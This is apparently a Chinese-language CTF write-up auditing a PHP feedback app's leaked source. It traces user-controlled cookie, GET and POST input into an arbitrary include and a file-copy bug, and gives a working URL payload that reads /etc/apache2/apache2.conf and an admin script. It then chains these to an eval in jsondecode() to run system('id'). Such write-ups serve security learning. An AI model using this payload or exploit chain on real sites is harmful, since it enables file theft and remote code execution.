条条大路通罗马系列1 web writeup
0x00 代码审计
访问/sgbmwww.zip下载源码,里面只有sgbmwww里的内容. 功能是简单的反馈,表单经过自写的jsonencode()处理然后insert入库.
include.php 定义了变量$_M[‘form’] 第100行
$_M['form'] =array();
isset($_REQUEST['GLOBALS']) && exit('Access Error');
foreach($_COOKIE as $_key => $_value) {
$_key{0} != '_' && $_M['form'][$_key] = daddslashes($_value);
}
foreach($_POST as $_key => $_value) {
$_key{0} != '_' && $_M['form'][$_key] = daddslashes($_value);
}
foreach($_GET as $_key => $_value) {
$_key{0} != '_' && $_M['form'][$_key] = daddslashes($_value);
}
cookie 和post,get 都是可控的.
-
任意包含php 在
index.php第6行include PATH_WEB . $_M[‘form’][‘class’].’.php’;
$_M['form']['class']可控可惜后缀写死了php
- 任意文件复制(实现读取)
upfile.php第64行if (move_uploaded_file($file_tmp, $file_name)) { $upfileok=1; } else if (copy($file_tmp, $file_name)) { $upfileok=1; }这里
$file_tmp可控,$file_name由set_savename()来控制. 如果$_M['form']['is_rename']为0$_M['form']['name']过滤一番然后赋值给$file_name
$_M['form']都可控. payload:
/index.php?class=upfile&is_rename=0&formname[tmp_name]=/etc/apache2/apache2.conf&formname[name]=xx.2333
发送以后访问 /upload/xx.2333 得到 
发现并木有开放8080端口. 利用这个读取把/var/www/html/sgbmadmin/index.php读了。
- 代码执行 sgbmadmin/index.php 第46行
$content = jsondecode($row['content']);jsondecode()有个eval可控 通过eval来执行php代码。(配合上面的任意php include漏洞执行我们代码)
利用发现的注入插入构造的代码
base64个system(‘id’) 出来是这样的
ps:多谢大神的指点.